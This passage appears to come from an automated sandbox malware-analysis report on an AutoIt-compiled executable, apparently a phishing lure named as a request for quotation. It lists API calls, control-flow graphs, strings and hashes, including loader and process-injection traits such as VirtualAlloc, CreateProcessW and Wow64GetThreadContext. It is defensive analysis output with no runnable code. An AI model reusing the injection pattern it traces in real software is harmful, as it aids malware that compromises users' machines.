                                              • Instruction Fuzzy Hash: 2571807150D3419EC714EFA5EC81AABBBE8FF99340F44482EF485D31A1EB709A89CB51

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 000E3A62
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 000E3A71
                                              • LoadIconW.USER32(00000063), ref: 000E3A88
                                              • LoadIconW.USER32(000000A4), ref: 000E3A9A
                                              • LoadIconW.USER32(000000A2), ref: 000E3AAC
                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000E3AD2
                                              • RegisterClassExW.USER32(?), ref: 000E3B28
                                                • Part of subcall function 000E3041: GetSysColorBrush.USER32(0000000F), ref: 000E3074
                                                • Part of subcall function 000E3041: RegisterClassExW.USER32(00000030), ref: 000E309E
                                                • Part of subcall function 000E3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000E30AF
                                                • Part of subcall function 000E3041: InitCommonControlsEx.COMCTL32(?), ref: 000E30CC
                                                • Part of subcall function 000E3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000E30DC
                                                • Part of subcall function 000E3041: LoadIconW.USER32(000000A9), ref: 000E30F2
                                                • Part of subcall function 000E3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000E3101
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                              • String ID: #$0$AutoIt v3
                                              • API String ID: 423443420-4155596026
                                              • Opcode ID: 2c6b9a57900d57bda61e4147097255dc774f03d9b0de7320e7bb4ec526707fda
                                              • Instruction ID: aca9fde89973b7fc3bcb0a3febfc2b1c0770d9e752b951e7c41531a50f407dc9
                                              • Opcode Fuzzy Hash: 2c6b9a57900d57bda61e4147097255dc774f03d9b0de7320e7bb4ec526707fda
                                              • Instruction Fuzzy Hash: BA213B71E00308AFEB109FA5EC09BAD7FB4FB09711F04412AF504A76A0D7BA5694DF94

                                              Control-flow Graph

                                              control_flow_graph 767 e3633-e3681 769 e3683-e3686 767->769 770 e36e1-e36e3 767->770 771 e3688-e368f 769->771 772 e36e7 769->772 770->769 773 e36e5 770->773 774 e375d-e3765 PostQuitMessage 771->774 775 e3695-e369a 771->775 777 e36ed-e36f0 772->777 778 11d31c-11d34a call f11d0 call f11f3 772->778 776 e36ca-e36d2 DefWindowProcW 773->776 783 e3711-e3713 774->783 779 11d38f-11d3a3 call 142a16 775->779 780 e36a0-e36a2 775->780 782 e36d8-e36de 776->782 784 e3715-e373c SetTimer RegisterWindowMessageW 777->784 785 e36f2-e36f3 777->785 813 11d34f-11d356 778->813 779->783 805 11d3a9 779->805 786 e36a8-e36ad 780->786 787 e3767-e3776 call e4531 780->787 783->782 784->783 788 e373e-e3749 CreatePopupMenu 784->788 791 e36f9-e370c KillTimer call e44cb call e3114 785->791 792 11d2bf-11d2c2 785->792 793 11d374-11d37b 786->793 794 e36b3-e36b8 786->794 787->783 788->783 791->783 798 11d2c4-11d2c6 792->798 799 11d2f8-11d317 MoveWindow 792->799 793->776 802 11d381-11d38a call 13817e 793->802 803 e36be-e36c4 794->803 804 e374b-e375b call e45df 794->804 808 11d2e7-11d2f3 SetFocus 798->808 809 11d2c8-11d2cb 798->809 799->783 802->776 803->776 803->813 804->783 805->776 808->783 809->803 814 11d2d1-11d2e2 call f11d0 809->814 813->776 818 11d35c-11d36f call e44cb call e43db 813->818 814->783 818->776
                                              APIs
                                              • DefWindowProcW.USER32(?,?,?,?), ref: 000E36D2
                                              • KillTimer.USER32(?,00000001), ref: 000E36FC
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000E371F
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000E372A
                                              • CreatePopupMenu.USER32 ref: 000E373E
                                              • PostQuitMessage.USER32(00000000), ref: 000E375F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                              • String ID: TaskbarCreated
                                              • API String ID: 129472671-2362178303
                                              • Opcode ID: a38c88d40cfa0564b926e9d4b66293c7d467de6256b61854789200deffd7d0d4
                                              • Instruction ID: c99d110591699b54d43819efeed162bd892b8ba94dc0e90e02bcab123d6001e4
                                              • Opcode Fuzzy Hash: a38c88d40cfa0564b926e9d4b66293c7d467de6256b61854789200deffd7d0d4
                                              • Instruction Fuzzy Hash: 644105B2204285AFDF345F75EC4DBBD3B99EB01300F180129F552F76A2CBA59E919361

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                              • API String ID: 1825951767-3513169116
                                              • Opcode ID: c1389f01ee10e33132bc2b51cf9cdc9c87c71d82bbf3ee01511ddf8253551105
                                              • Instruction ID: cedf65b41f6a76548ee278ab390cef41ff32a31bd874c71c6dcc77d25277e3a3
                                              • Opcode Fuzzy Hash: c1389f01ee10e33132bc2b51cf9cdc9c87c71d82bbf3ee01511ddf8253551105
                                              • Instruction Fuzzy Hash: 57A15F719102A99ECF14EFA2DC95EEEBB78BF14300F44042AF416B7192EF745A09CB60

                                              Control-flow Graph

                                              control_flow_graph 942 ef2610-ef26be call ef0000 945 ef26c5-ef26eb call ef3520 CreateFileW 942->945 948 ef26ed 945->948 949 ef26f2-ef2702 945->949 950 ef283d-ef2841 948->950 954 ef2709-ef2723 VirtualAlloc 949->954 955 ef2704 949->955 951 ef2883-ef2886 950->951 952 ef2843-ef2847 950->952 956 ef2889-ef2890 951->956 957 ef2849-ef284c 952->957 958 ef2853-ef2857 952->958 959 ef272a-ef2741 ReadFile 954->959 960 ef2725 954->960 955->950 961 ef28e5-ef28fa 956->961 962 ef2892-ef289d 956->962 957->958 963 ef2859-ef2863 958->963 964 ef2867-ef286b 958->964 967 ef2748-ef2788 VirtualAlloc 959->967 968 ef2743 959->968 960->950 971 ef28fc-ef2907 VirtualFree 961->971 972 ef290a-ef2912 961->972 969 ef289f 962->969 970 ef28a1-ef28ad 962->970 963->964 965 ef286d-ef2877 964->965 966 ef287b 964->966 965->966 966->951 973 ef278f-ef27aa call ef3770 967->973 974 ef278a 967->974 968->950 969->961 975 ef28af-ef28bf 970->975 976 ef28c1-ef28cd 970->976 971->972 982 ef27b5-ef27bf 973->982 974->950 978 ef28e3 975->978 979 ef28cf-ef28d8 976->979 980 ef28da-ef28e0 976->980 978->956 979->978 980->978 983 ef27f2-ef2806 call ef3580 982->983 984 ef27c1-ef27f0 call ef3770 982->984 989 ef280a-ef280e 983->989 990 ef2808 983->990 984->982 992 ef281a-ef281e 989->992 993 ef2810-ef2814 FindCloseChangeNotification 989->993 990->950 994 ef282e-ef2837 992->994 995 ef2820-ef282b VirtualFree 992->995 993->992 994->945 994->950 995->994
                                              APIs
                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00EF26E1
                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EF2907
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1432375830.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_ef0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CreateFileFreeVirtual
                                              • String ID:
                                              • API String ID: 204039940-0
                                              • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                              • Instruction ID: d21fc584869b892cce38d4e352c56bbac3af04bebeca10b399a0ff90f8f323ec
                                              • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                              • Instruction Fuzzy Hash: F6A1E474E0020DEBDB18DFE4C895BEEBBB5BF48304F209159E605BB280D7799A41DB94

                                              Control-flow Graph

                                              control_flow_graph 1073 e39e7-e3a57 CreateWindowExW * 2 ShowWindow * 2
                                              APIs
                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000E3A15
                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000E3A36
                                              • ShowWindow.USER32(00000000,?,?), ref: 000E3A4A
                                              • ShowWindow.USER32(00000000,?,?), ref: 000E3A53
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$CreateShow
                                              • String ID: AutoIt v3$edit
                                              • API String ID: 1584632944-3779509399
                                              • Opcode ID: 3f6639e06b4cae9ac05b3052246ab1487f8d11c9541fcabc2b17483df4ac9c9c
                                              • Instruction ID: 61205e86c103a44ae6f587e743bc93a285b16183d2037fc0a6fb31d412384cfd
                                              • Opcode Fuzzy Hash: 3f6639e06b4cae9ac05b3052246ab1487f8d11c9541fcabc2b17483df4ac9c9c
                                              • Instruction Fuzzy Hash: 6DF0DA716412907EEA315B277C49F6B3E7DD7C7F50F04412EB904A2570C6A51891DAB0

                                              Control-flow Graph

                                              control_flow_graph 1074 ef23b0-ef2512 call ef0000 call ef22a0 CreateFileW 1081 ef2519-ef2529 1074->1081 1082 ef2514 1074->1082 1085 ef252b 1081->1085 1086 ef2530-ef254a VirtualAlloc 1081->1086 1083 ef25c9-ef25ce 1082->1083 1085->1083 1087 ef254e-ef2565 ReadFile 1086->1087 1088 ef254c 1086->1088 1089 ef2569-ef25a3 call ef22e0 call ef12a0 1087->1089 1090 ef2567 1087->1090 1088->1083 1095 ef25bf-ef25c7 ExitProcess 1089->1095 1096 ef25a5-ef25ba call ef2330 1089->1096 1090->1083 1095->1083 1096->1095
                                              APIs
                                                • Part of subcall function 00EF22A0: Sleep.KERNELBASE(000001F4), ref: 00EF22B1
                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00EF2508
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1432375830.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_ef0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CreateFileSleep
                                              • String ID: 70T4CLEGPX9JEIWJNYK5AI2
                                              • API String ID: 2694422964-3916617480
                                              • Opcode ID: 28e137903d0d60fa8573a4094b0d420b9d30e4a25843faaea1f994ef03fb4c33
                                              • Instruction ID: 35627523f36e3904b9d1ab36f235d5e6b6de6eedee5389075169d0ddbff8cb14
                                              • Opcode Fuzzy Hash: 28e137903d0d60fa8573a4094b0d420b9d30e4a25843faaea1f994ef03fb4c33
                                              • Instruction Fuzzy Hash: EE616030D1428CDAEF11DBE4D854BEEBB75AF14304F144199E248BB2C1D7BA1B45CBA6

                                              Control-flow Graph

                                              control_flow_graph 1098 e410d-e4123 1099 e4129-e413e call e7b76 1098->1099 1100 e4200-e4204 1098->1100 1103 e4144-e4164 call e7d2c 1099->1103 1104 11d5dd-11d5ec LoadStringW 1099->1104 1107 11d5f7-11d60f call e7c8e call e7143 1103->1107 1108 e416a-e416e 1103->1108 1104->1107 1117 e417e-e41fb call 103020 call e463e call 102ffc Shell_NotifyIconW call e5a64 1107->1117 1120 11d615-11d633 call e7e0b call e7143 call e7e0b 1107->1120 1110 e4174-e4179 call e7c8e 1108->1110 1111 e4205-e420e call e81a7 1108->1111 1110->1117 1111->1117 1117->1100 1120->1117
                                              APIs
                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0011D5EC
                                                • Part of subcall function 000E7D2C: _memmove.LIBCMT ref: 000E7D66
                                              • _memset.LIBCMT ref: 000E418D
                                              • _wcscpy.LIBCMT ref: 000E41E1
                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000E41F1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                              • String ID: Line:
                                              • API String ID: 3942752672-1585850449
                                              • Opcode ID: 8f3b03e9bc2feb3f19525975aeda3d1c14308910644da8b53fba01ec8e675422
                                              • Instruction ID: c7712846b63627a2e451fea736a14cc7ec00d3f7c680642fb03fb5a1715aff04
                                              • Opcode Fuzzy Hash: 8f3b03e9bc2feb3f19525975aeda3d1c14308910644da8b53fba01ec8e675422
                                              • Instruction Fuzzy Hash: D331D171008384AED765EB61DC46FDB77ECAF55300F14451FF198A20A2EBB4A688C793

                                              Control-flow Graph

                                              control_flow_graph 1133 10564d-105666 1134 105683 1133->1134 1135 105668-10566d 1133->1135 1136 105685-10568b 1134->1136 1135->1134 1137 10566f-105671 1135->1137 1138 105673-105678 call 108d68 1137->1138 1139 10568c-105691 1137->1139 1147 10567e call 108ff6 1138->1147 1140 105693-10569d 1139->1140 1141 10569f-1056a3 1139->1141 1140->1141 1143 1056c3-1056d2 1140->1143 1144 1056b3-1056b5 1141->1144 1145 1056a5-1056b0 call 103020 1141->1145 1150 1056d4-1056d7 1143->1150 1151 1056d9 1143->1151 1144->1138 1149 1056b7-1056c1 1144->1149 1145->1144 1147->1134 1149->1138 1149->1143 1154 1056de-1056e3 1150->1154 1151->1154 1155 1056e9-1056f0 1154->1155 1156 1057cc-1057cf 1154->1156 1157 105731-105733 1155->1157 1158 1056f2-1056fa 1155->1158 1156->1136 1160 105735-105737 1157->1160 1161 10579d-10579e call 110df7 1157->1161 1158->1157 1159 1056fc 1158->1159 1162 105702-105704 1159->1162 1163 1057fa 1159->1163 1164 105739-105741 1160->1164 1165 10575b-105766 1160->1165 1174 1057a3-1057a7 1161->1174 1169 105706-105708 1162->1169 1170 10570b-105710 1162->1170 1171 1057fe-105807 1163->1171 1172 105751-105755 1164->1172 1173 105743-10574f 1164->1173 1167 105768 1165->1167 1168 10576a-10576d 1165->1168 1167->1168 1175 1057d4-1057d8 1168->1175 1176 10576f-10577b call 104916 call 1110ab 1168->1176 1169->1170 1170->1175 1177 105716-10572f call 110f18 1170->1177 1171->1136 1178 105757-105759 1172->1178 1173->1178 1174->1171 1179 1057a9-1057ae 1174->1179 1180 1057ea-1057f5 call 108d68 1175->1180 1181 1057da-1057e7 call 103020 1175->1181 1194 105780-105785 1176->1194 1193 105792-10579b 1177->1193 1178->1168 1179->1175 1184 1057b0-1057c1 1179->1184 1180->1147 1181->1180 1189 1057c4-1057c6 1184->1189 1189->1155 1189->1156 1193->1189 1195 10578b-10578e 1194->1195 1196 10580c-105810 1194->1196 1195->1163 1197 105790 1195->1197 1196->1171 1197->1193
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                              • String ID:
                                              • API String ID: 1559183368-0
                                              • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                              • Instruction ID: eec88c57e5d02432dcf6fb073d66cf68e003885f7bfc4c512df087787920a584
                                              • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                              • Instruction Fuzzy Hash: 1451B470A00B05DBDB289FA9C88066F77B7AF54320FA48729F8A5962D0D7F19D50AF50
                                              APIs
                                                • Part of subcall function 000E4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,001A62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000E4F6F
                                              • _free.LIBCMT ref: 0011E68C
                                              • _free.LIBCMT ref: 0011E6D3
                                                • Part of subcall function 000E6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 000E6D0D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                              • API String ID: 2861923089-1757145024
                                              • Opcode ID: 6e4e0d9ff4da3e58db9f221894e95fd7d0aa65ac3495eb5ca3d5098818c09b21
                                              • Instruction ID: 9a0113792a8b5731efa5025d3aa09a5f405a613c2f168fde21400f29b6130840
                                              • Opcode Fuzzy Hash: 6e4e0d9ff4da3e58db9f221894e95fd7d0aa65ac3495eb5ca3d5098818c09b21
                                              • Instruction Fuzzy Hash: F0916D71910259EFCF08EFA5CC919EDB7B5FF18314F544429F815AB2A2EB309945CB50
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,000E35A1,SwapMouseButtons,00000004,?), ref: 000E35D4
                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,000E35A1,SwapMouseButtons,00000004,?,?,?,?,000E2754), ref: 000E35F5
                                              • RegCloseKey.KERNELBASE(00000000,?,?,000E35A1,SwapMouseButtons,00000004,?,?,?,?,000E2754), ref: 000E3617
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: Control Panel\Mouse
                                              • API String ID: 3677997916-824357125
                                              • Opcode ID: c102b8cfc0746ca8ea9f067875cc55ca1e43a95d00aa44003bf16717233ec83f
                                              • Instruction ID: f2128f2d13224a70eb9aa9ecd48776e88d676272fdfb628610047c2d92b60829
                                              • Opcode Fuzzy Hash: c102b8cfc0746ca8ea9f067875cc55ca1e43a95d00aa44003bf16717233ec83f
                                              • Instruction Fuzzy Hash: 29115A75511248BFDB20CFA5EC48DAFBBB9EF05740F018469F805E7220D2719F419760
                                              APIs
                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00EF1A5B
                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00EF1AF1
                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EF1B13
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1432375830.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_ef0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                              • String ID:
                                              • API String ID: 2438371351-0
                                              • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                              • Instruction ID: 221cbff894ef2bd3aff2aa246d77a21dcc3c91c4a784477faf4e0a09bb031c93
                                              • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                              • Instruction Fuzzy Hash: 1C62FC30A1465CDBEB24CFA4C851BEEB371EF58304F1091A9D20DEB294E7759E81CB59
                                              APIs
                                                • Part of subcall function 000E5045: _fseek.LIBCMT ref: 000E505D
                                                • Part of subcall function 001499BE: _wcscmp.LIBCMT ref: 00149AAE
                                                • Part of subcall function 001499BE: _wcscmp.LIBCMT ref: 00149AC1
                                              • _free.LIBCMT ref: 0014992C
                                              • _free.LIBCMT ref: 00149933
                                              • _free.LIBCMT ref: 0014999E
                                                • Part of subcall function 00102F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00109C64), ref: 00102FA9
                                                • Part of subcall function 00102F95: GetLastError.KERNEL32(00000000,?,00109C64), ref: 00102FBB
                                              • _free.LIBCMT ref: 001499A6
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                              • String ID:
                                              • API String ID: 1552873950-0
                                              • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                              • Instruction ID: 71f8995b05e9283aee9689bc0eb4915eed45981b84c388ea223e543d3d48b55f
                                              • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                              • Instruction Fuzzy Hash: 44517FB1D04258AFDF249F65CC85A9EBBB9EF48304F0004AEF249A7291DB715E90CF58
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                              • String ID:
                                              • API String ID: 2782032738-0
                                              • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                              • Instruction ID: ba2b3a29d61a40dc49bfb3cb66b7b7fd0a564fea2447d96b3e4d334c0c811845
                                              • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                              • Instruction Fuzzy Hash: 3541B4B0700606DBDB28CEA9C8C09AF77A5AF88364B24813DEAD6876D0D7F09D418744
                                              APIs
                                              • _memset.LIBCMT ref: 0011EE62
                                              • GetOpenFileNameW.COMDLG32(?), ref: 0011EEAC
                                                • Part of subcall function 000E48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000E48A1,?,?,000E37C0,?), ref: 000E48CE
                                                • Part of subcall function 001009D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001009F4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
